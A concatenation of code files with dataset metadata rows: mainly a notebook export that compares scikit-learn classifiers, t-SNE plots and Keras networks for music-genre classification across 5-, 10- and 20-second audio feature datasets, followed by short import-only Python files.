    models.append(('log', LogisticRegression(solver='lbfgs', max_iter=4000)))
    models.append(('svm', SVC(kernel = 'linear', random_state = 42, gamma = 'scale')))
    models.append(('dt', tree.DecisionTreeClassifier(criterion='entropy')))
    models.append(('knn7', KNeighborsClassifier(n_neighbors=7)))
    ensemble = VotingClassifier(estimators=models, voting='hard')
    return ensemble
ensemble = voting()
#ensemble.fit(X_norm, y)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(ensemble, X_norm, y, cv=cv, scoring='accuracy')
print('Using Ensemble',scores.mean())
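# A soft-voting variant of the ensemble above averages predicted class
# probabilities instead of counting hard votes; SVC then needs
# probability=True. A sketch under that assumption:
soft_models = [('log', LogisticRegression(solver='lbfgs', max_iter=4000)),
               ('svm', SVC(kernel='linear', random_state=42, gamma='scale', probability=True)),
               ('dt', tree.DecisionTreeClassifier(criterion='entropy')),
               ('knn7', KNeighborsClassifier(n_neighbors=7))]
soft_ensemble = VotingClassifier(estimators=soft_models, voting='soft')
soft_scores = cross_val_score(soft_ensemble, X_norm, y,
                              cv=StratifiedKFold(n_splits=5), scoring='accuracy')
print('Using soft-voting ensemble', soft_scores.mean())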
import numpy as np
import random
from keras.layers import Conv2D, BatchNormalization, Dense, MaxPool2D, Input, ZeroPadding2D, MaxPooling2D, Flatten
from keras.models import Sequential
from keras.utils import np_utils
import pickle
from keras.optimizers import SGD
from keras.models import load_model
model = Sequential()
# NOTE: Conv2D needs image-shaped input; the flat feature rows above must be
# reshaped to (height, width, channels) and the first layer given an
# input_shape before this network can run (see the sketch below).
model.add(ZeroPadding2D(padding=(1, 1)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D())
model.add(Flatten())
model.add(Dense(10, activation='softmax'))
sgd = SGD(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
# x_train/y_train come from the (commented-out) train/test split above and are
# assumed to be reshaped and one-hot encoded
history = model.fit(x_train, y_train, batch_size=100, epochs=25)
scores = model.evaluate(x_test, y_test)
print("Accuracy: %.2f%%" % (scores[1] * 100))
"""#**10 second dataset**"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_10s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_10s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.transform(x_test)  # reuse the scaler fitted on the training data
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
def tsne2D(): # apply t-SNE to dataset_1 to reduce it to two dimensions (default perplexity 30; a perplexity-40 run is left commented out)
    tsneDatasetOneTwoDimPerp_30 = TSNE().fit_transform(X_norm)
    #tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
    # plotting the tsne data
    fig, img = plt.subplots(1, 1, figsize=(15, 5), sharex='col', sharey='row')
    ax11 = img.scatter(tsneDatasetOneTwoDimPerp_30[:, 0], tsneDatasetOneTwoDimPerp_30[:, 1], c=y)
    #ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0], tsneDatasetOneTwoDimPerp_40[:,1], c=y_subset)
    cbar = plt.colorbar(ax11)
    #ticks = [0,1,2,3,4,5,6,7,8,9]
    #cbar.set_ticks(ticks)
    fig.suptitle("TSNE on 10-sec length samples")
    plt.xlabel("Dimension 1")
    plt.ylabel("Dimension 2")
    #cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
    plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
def tsne3D(): # apply t-SNE to dataset_1 to reduce it to three dimensions
    tsneDatasetOneThreeDim = TSNE(n_components=3).fit_transform(X_norm)
    # plotting the tsne data in a 3D scatter
    fig = plt.figure(figsize=(10, 7))
    ax = plt.axes(projection="3d")
    ax11 = ax.scatter(tsneDatasetOneThreeDim[:, 0], tsneDatasetOneThreeDim[:, 1], tsneDatasetOneThreeDim[:, 2], c=y)
    cbar = plt.colorbar(ax11)
    fig.suptitle("TSNE on 10-sec length samples")
    ax.set_xlabel("Dimension 1")
    ax.set_ylabel("Dimension 2")
    ax.set_zlabel("Dimension 3")
    plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne3D()
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
model = LogisticRegression(solver='lbfgs', max_iter=4000)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
print("Using cross validation")
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'poly', degree = 2,random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='entropy',max_depth = 5)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='gini')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier(n_neighbors=7)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
model = LogisticRegression(solver='lbfgs', max_iter=1000)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred1 = cross_val_predict(model, X_norm, y, cv=cv)
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred2 = cross_val_predict(model, X_norm, y, cv=cv)
model = tree.DecisionTreeClassifier(criterion='entropy')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred3 = cross_val_predict(model, X_norm, y, cv=cv)
model = KNeighborsClassifier(n_neighbors=7)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred4 = cross_val_predict(model, X_norm, y, cv=cv)
from sklearn.ensemble import VotingClassifier
def voting():
    models = list()
    models.append(('log', LogisticRegression(solver='lbfgs', max_iter=4000)))
    models.append(('svm', SVC(kernel = 'linear', random_state = 42, gamma = 'scale')))
    models.append(('dt', tree.DecisionTreeClassifier(criterion='entropy')))
    models.append(('knn7', KNeighborsClassifier(n_neighbors=7)))
    ensemble = VotingClassifier(estimators=models, voting='hard')
    return ensemble
ensemble = voting()
#ensemble.fit(X_norm, y)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(ensemble, X_norm, y, cv=cv, scoring='accuracy')
print('Using Ensemble',scores.mean())
"""#**20 second dataset**"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_20s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_20s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.transform(x_test)  # reuse the scaler fitted on the training data
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
def tsne2D(): # apply t-SNE to dataset_1 to reduce it to two dimensions (default perplexity 30; a perplexity-40 run is left commented out)
    tsneDatasetOneTwoDimPerp_30 = TSNE().fit_transform(X_norm)
    #tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
    # plotting the tsne data
    fig, img = plt.subplots(1, 1, figsize=(15, 5), sharex='col', sharey='row')
    ax11 = img.scatter(tsneDatasetOneTwoDimPerp_30[:, 0], tsneDatasetOneTwoDimPerp_30[:, 1], c=y)
    #ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0], tsneDatasetOneTwoDimPerp_40[:,1], c=y_subset)
    cbar = plt.colorbar(ax11)
    #ticks = [0,1,2,3,4,5,6,7,8,9]
    #cbar.set_ticks(ticks)
    fig.suptitle("TSNE on 20-sec length samples")
    plt.xlabel("Dimension 1")
    plt.ylabel("Dimension 2")
    #cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
    plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
def tsne3D(): # apply t-SNE to dataset_1 to reduce it to three dimensions
    tsneDatasetOneThreeDim = TSNE(n_components=3).fit_transform(X_norm)
    # plotting the tsne data in a 3D scatter
    fig = plt.figure(figsize=(10, 7))
    ax = plt.axes(projection="3d")
    ax11 = ax.scatter(tsneDatasetOneThreeDim[:, 0], tsneDatasetOneThreeDim[:, 1], tsneDatasetOneThreeDim[:, 2], c=y)
    cbar = plt.colorbar(ax11)
    fig.suptitle("TSNE on 20-sec length samples")
    ax.set_xlabel("Dimension 1")
    ax.set_ylabel("Dimension 2")
    ax.set_zlabel("Dimension 3")
    plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne3D()
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
model = LogisticRegression(solver='lbfgs', max_iter=4000)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
print("Using cross validation")
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'poly', degree = 2,random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='entropy',max_depth = 5)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='gini')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier(n_neighbors=7)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
model = LogisticRegression(solver='lbfgs', max_iter=1000)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred1 = cross_val_predict(model, X_norm, y, cv=cv)
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred2 = cross_val_predict(model, X_norm, y, cv=cv)
model = tree.DecisionTreeClassifier(criterion='entropy')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred3 = cross_val_predict(model, X_norm, y, cv=cv)
model = KNeighborsClassifier(n_neighbors=7)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred4 = cross_val_predict(model, X_norm, y, cv=cv)
from sklearn.ensemble import VotingClassifier
def voting():
    models = list()
    models.append(('log', LogisticRegression(solver='lbfgs', max_iter=4000)))
    models.append(('svm', SVC(kernel = 'linear', random_state = 42, gamma = 'scale')))
    models.append(('dt', tree.DecisionTreeClassifier(criterion='entropy')))
    models.append(('knn7', KNeighborsClassifier(n_neighbors=7)))
    ensemble = VotingClassifier(estimators=models, voting='hard')
    return ensemble
ensemble = voting()
#ensemble.fit(X_norm, y)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(ensemble, X_norm, y, cv=cv, scoring='accuracy')
print('Using Ensemble',scores.mean())
"""#**Using Neural Networks on all the above datasets**
##***5 second dataset***
"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.transform(x_test)  # reuse the scaler fitted on the training data
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
from keras.utils import to_categorical
y = to_categorical(y)
y_test = to_categorical(y_test)
import numpy as np
import random
from keras.layers import Dense, Input, Dropout
from keras.models import Sequential
from keras.utils import np_utils
import pickle
from keras.optimizers import SGD
from keras.models import load_model
model = Sequential()
model.add(Dense(units=32, activation='relu', input_dim=29))
model.add(Dense(units=16, activation='relu'))
model.add(Dense(units=8, activation='relu'))
model.add(Dense(units=5, activation='softmax'))
sgd = SGD(lr=0.001)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
history = model.fit(X_norm,y,batch_size=10,epochs=50)
scores = model.evaluate(x_test, y_test)
print("Accuracy: %.2f%%" % (scores[1]*100))
"""#10 sec neural"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_10s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_10s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.transform(x_test)  # reuse the scaler fitted on the training data
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
from keras.utils import to_categorical
y = to_categorical(y)
y_test = to_categorical(y_test)
model = Sequential()
model.add(Dense(units=32, activation='relu', input_dim=29))
#model.add(Dense(units=64, activation='relu'))
model.add(Dense(units=16, activation='relu'))
model.add(Dense(units=8, activation='relu'))
model.add(Dense(units=5, activation='softmax'))
sgd = SGD(lr=0.001)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
history = model.fit(X_norm,y,batch_size=10,epochs=150)
scores = model.evaluate(x_test, y_test)
print("Accuracy: %.2f%%" % (scores[1]*100))
"""#20 sec neural"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_20s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_20s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.transform(x_test)  # reuse the scaler fitted on the training data
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
from keras.utils import to_categorical
y = to_categorical(y)
y_test = to_categorical(y_test)
model = Sequential()
model.add(Dense(units=32, activation='relu', input_dim=29))
#model.add(Dense(units=64, activation='relu'))
model.add(Dense(units=16, activation='relu'))
model.add(Dense(units=8, activation='relu'))
model.add(Dense(units=5, activation='softmax'))
sgd = SGD(lr=0.001)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
history = model.fit(X_norm,y,batch_size=10,epochs=150)
scores = model.evaluate(x_test, y_test)
print("Accuracy: %.2f%%" % (scores[1]*100))
| 35.776929
| 127
| 0.732085
| 7,065
| 46,832
| 4.648266
| 0.037509
| 0.03313
| 0.016809
| 0.024787
| 0.97838
| 0.97838
| 0.977253
| 0.977132
| 0.974848
| 0.974665
| 0
| 0.023197
| 0.135655
| 46,832
| 1,308
| 128
| 35.804281
| 0.788088
| 0.255552
| 0
| 0.950565
| 0
| 0
| 0.08107
| 0.021682
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059322
| false
| 0
| 0.177966
| 0
| 0.283898
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8d9a71f644801c781308413bd36d45bc2cf24e3
| 112
|
py
|
Python
|
sb3_contrib/tqc/__init__.py
|
qgallouedec/stable-baselines3-contrib
|
bec00386d14b505015c54413cd5cd968e6f85c72
|
[
"MIT"
] | 93
|
2020-10-22T14:44:58.000Z
|
2022-03-25T20:06:47.000Z
|
sb3_contrib/tqc/__init__.py
|
qgallouedec/stable-baselines3-contrib
|
bec00386d14b505015c54413cd5cd968e6f85c72
|
[
"MIT"
] | 36
|
2020-10-26T11:13:23.000Z
|
2022-03-31T15:11:05.000Z
|
sb3_contrib/tqc/__init__.py
|
qgallouedec/stable-baselines3-contrib
|
bec00386d14b505015c54413cd5cd968e6f85c72
|
[
"MIT"
] | 50
|
2020-12-06T14:21:10.000Z
|
2022-03-31T14:25:36.000Z
|
from sb3_contrib.tqc.policies import CnnPolicy, MlpPolicy, MultiInputPolicy
from sb3_contrib.tqc.tqc import TQC
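# For context, a minimal hedged usage sketch of the TQC class exported here,
# following the standard Stable-Baselines3 API (the environment id and
# timestep budget are illustrative):
from sb3_contrib import TQC

model = TQC("MlpPolicy", "Pendulum-v1", verbose=1)
model.learn(total_timesteps=10_000)
model.save("tqc_pendulum")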
| 37.333333
| 75
| 0.857143
| 16
| 112
| 5.875
| 0.5625
| 0.148936
| 0.297872
| 0.361702
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.089286
| 112
| 2
| 76
| 56
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
770f218cafa5fe8cc76c1e1055d8d3ba852471de
| 148
|
py
|
Python
|
test.py
|
edawson/SigProfilerMatrixGenerator
|
bd6d3bb15e87805cdc7e771c3fdd886f4a9fc29b
|
[
"BSD-2-Clause"
] | 59
|
2019-06-05T08:49:14.000Z
|
2022-03-22T11:10:05.000Z
|
test.py
|
edawson/SigProfilerMatrixGenerator
|
bd6d3bb15e87805cdc7e771c3fdd886f4a9fc29b
|
[
"BSD-2-Clause"
] | 54
|
2019-06-04T13:06:20.000Z
|
2022-01-14T00:30:51.000Z
|
test.py
|
edawson/SigProfilerMatrixGenerator
|
bd6d3bb15e87805cdc7e771c3fdd886f4a9fc29b
|
[
"BSD-2-Clause"
] | 20
|
2019-08-22T09:03:01.000Z
|
2022-02-01T19:35:12.000Z
|
from SigProfilerMatrixGenerator import install as genInstall
from SigProfilerMatrixGenerator.scripts import SigProfilerMatrixGeneratorFunc as matGen
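# A hedged sketch of how these two imports are typically combined; the project
# name, genome build, and input path are illustrative placeholders:
from SigProfilerMatrixGenerator import install as genInstall
from SigProfilerMatrixGenerator.scripts import SigProfilerMatrixGeneratorFunc as matGen

genInstall.install('GRCh37')  # one-time reference genome download
matrices = matGen.SigProfilerMatrixGeneratorFunc('example_project', 'GRCh37',
                                                 '/path/to/project/')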
| 74
| 87
| 0.918919
| 13
| 148
| 10.461538
| 0.692308
| 0.441176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074324
| 148
| 2
| 87
| 74
| 0.992701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7734e6a24bf8b4a765124722ee199ed9db3bd2b0
| 161
|
py
|
Python
|
src/mmw/apps/core/tests.py
|
lsetiawan/model-my-watershed
|
4646ebb486cb7902dce1b13c9ada32e80d22fcf0
|
[
"Apache-2.0"
] | 45
|
2015-05-25T22:55:21.000Z
|
2022-02-27T14:51:52.000Z
|
src/mmw/apps/core/tests.py
|
lsetiawan/model-my-watershed
|
4646ebb486cb7902dce1b13c9ada32e80d22fcf0
|
[
"Apache-2.0"
] | 3,213
|
2015-05-22T00:32:00.000Z
|
2022-03-31T15:05:08.000Z
|
src/mmw/apps/core/tests.py
|
lsetiawan/model-my-watershed
|
4646ebb486cb7902dce1b13c9ada32e80d22fcf0
|
[
"Apache-2.0"
] | 37
|
2015-05-22T12:30:46.000Z
|
2021-09-10T02:13:44.000Z
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
# Create your tests here.
| 23
| 39
| 0.78882
| 21
| 161
| 5.380952
